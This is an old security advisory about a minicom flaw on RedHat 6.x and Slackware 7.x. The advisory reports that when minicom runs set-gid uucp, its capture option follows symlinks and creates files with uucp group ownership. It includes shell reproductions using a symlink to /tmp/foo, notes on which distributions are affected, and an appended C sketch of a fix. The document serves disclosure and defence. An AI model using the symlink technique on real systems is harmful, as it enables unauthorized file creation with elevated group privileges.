COMMAND
minicom
SYSTEMS AFFECTED
RH 6.1 / 6.2
PROBLEM
Michal Zalewski found the following. On RedHat 6.1 and RedHat 6.2
boxes:
@(#)Minicom V1.83.0 (compiled Mar 7 2000)(c) Miquel van Smoorenburg
[lcamtuf@nimue lcamtuf]$ minicom -C foo
minicom: there is no global configuration file /etc/minirc.dfl
Ask your sysadm to create one (with minicom -s).
[lcamtuf@nimue lcamtuf]$ ls -l foo
-rw-rw-r-- 1 lcamtuf uucp 0 Aug 18 12:21 foo
    ^^               ^^^^
Any file can be created anywhere with uucp privileges - it will
follow symlinks. Not nice on systems running uucp services.
And the confirmation on Slackware 7.x using minicom 1.82 and
1.82.1...
Slackware 7.0
me@technolust> ln -s /tmp/foo .
me@technolust> ls -al /tmp/foo
ls: /tmp/foo: No such file or directory
me@technolust> (umask 2; minicom -C foo)
minicom: cannot open /dev/ttyS1: Permission denied
me@technolust> ls -al /tmp/foo
-rw-rw-r-- 1 me uucp 0 Aug 30 16:49 /tmp/foo
Slackware 7.1
me@mos> ln -s /tmp/foo .
me@mos> ls -al /tmp/foo
ls: /tmp/foo: No such file or directory
me@mos> (umask 2; minicom -C foo)
minicom: cannot open /dev/ttyS1: Permission denied
me@mos> ls -al /tmp/foo
-rw-rw-r-- 1 me uucp 0 Aug 30 16:46 /tmp/foo
SOLUTION
Mandrake 7.1 did not do this. On FreeBSD 4.1-STABLE, with
minicom 1.83.1, the file "foo" was created with the correct
uid/gid, using the default umask.
SuSE ships version 1.81.1 since July 27 1998 (that's back to the
good old SuSE-5.3 times) until now with SuSE-7.0. minicom is
installed root.uucp 0755 in all versions.
`chmod 2755 /usr/bin/minicom' and `minicom -C foo' afterwards does
not exhibit any problem because no file is created. For a user
of a SuSE system to be able to use minicom (restricted by device
permissions), she must be added to group uucp.
Conectiva Linux is not affected by this.
Debian/GNU Linux does not install minicom set[ug]id, and is not
vulnerable... verified on 2.1 (slink), 2.2 (potato), and "woody".
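The following is an added example, not code from minicom or from the original advisory. It sketches how a program installed set-gid (assumed here to be set-gid uucp, as the ls output above suggests) can open a user-named capture file with the invoking user's own group and refuse a symlink; the function name open_capture_as_user is hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Open a user-named capture file from a set-gid program without lending
 * the privileged group to the open(). Returns an fd, or -1 with errno set. */
int open_capture_as_user(const char *path)
{
    gid_t saved_egid = getegid();   /* e.g. uucp when installed set-gid */
    int fd, err;

    /* Temporarily take on the invoking user's real gid, so the file is
     * created (and every directory traversed) with the user's own rights. */
    if (setegid(getgid()) != 0)
        return -1;

    /* O_NOFOLLOW refuses a symlink as the final path component, even a
     * dangling one. Mode 0666 is still filtered by the caller's umask. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0666);
    err = errno;

    /* Regain the privileged gid, needed later for the serial device. */
    if (setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    int fd;

    if (argc != 2) {
        fprintf(stderr, "usage: %s capture-file\n", argv[0]);
        return 2;
    }
    fd = open_capture_as_user(argv[1]);
    if (fd < 0) {
        perror(argv[1]);
        return 1;
    }
    close(fd);
    return 0;
}
```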